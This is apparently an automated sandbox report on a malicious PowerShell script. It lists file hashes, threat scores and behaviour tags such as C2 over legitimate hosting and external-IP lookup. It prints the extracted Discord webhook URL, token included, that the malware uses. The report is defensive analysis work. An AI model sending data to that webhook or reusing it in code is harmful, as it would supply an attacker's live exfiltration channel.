General

  • Target

    script.ps1

  • Size

    5KB

  • Sample

    241110-w5564ascrq

  • MD5

    4ea0d3ddf52c65d8aa5ff1b269b69ad6

  • SHA1

    ccaf219e952e7f33c181c797d7306b4f41479f52

  • SHA256

    7e4f7184c4eddd2a0779320fd79ef05574649dd63add6fb4b7d5a3ccbfa650e0

  • SHA512

    cd3c1f68667323c5c90965bb940931b66297466ef7b0ff0d6b1845df1b29509dcbcdf6feb4b31d13cc96738616fe785f2a3270fb9673aac46eefeee2a9dcd171

  • SSDEEP

    96:T3jL1teXW6VoM3Lb8IRL139temI64JXnBFJYYQHJu8fHDrP8v:T3jLj6WYoM3LbRRveO4JXnrJxQpu8fjA

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://discord.com/api/webhooks/1305222842962677880/RET1goVsb6NqqkFKByr48S9Q7-9hwIHuCA1z1MRogltLQf8iK73DuFJyXXVx9xoCyzoa

Targets

    • Target

      script.ps1

    • Size

      5KB

    • MD5

      4ea0d3ddf52c65d8aa5ff1b269b69ad6

    • SHA1

      ccaf219e952e7f33c181c797d7306b4f41479f52

    • SHA256

      7e4f7184c4eddd2a0779320fd79ef05574649dd63add6fb4b7d5a3ccbfa650e0

    • SHA512

      cd3c1f68667323c5c90965bb940931b66297466ef7b0ff0d6b1845df1b29509dcbcdf6feb4b31d13cc96738616fe785f2a3270fb9673aac46eefeee2a9dcd171

    • SSDEEP

      96:T3jL1teXW6VoM3Lb8IRL139temI64JXnBFJYYQHJu8fHDrP8v:T3jLj6WYoM3LbRRveO4JXnrJxQpu8fjA

    Score
    8/10
    • Blocklisted process makes network request

    • Legitimate hosting services abused for malware hosting/C2

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

MITRE ATT&CK Enterprise v15

Tasks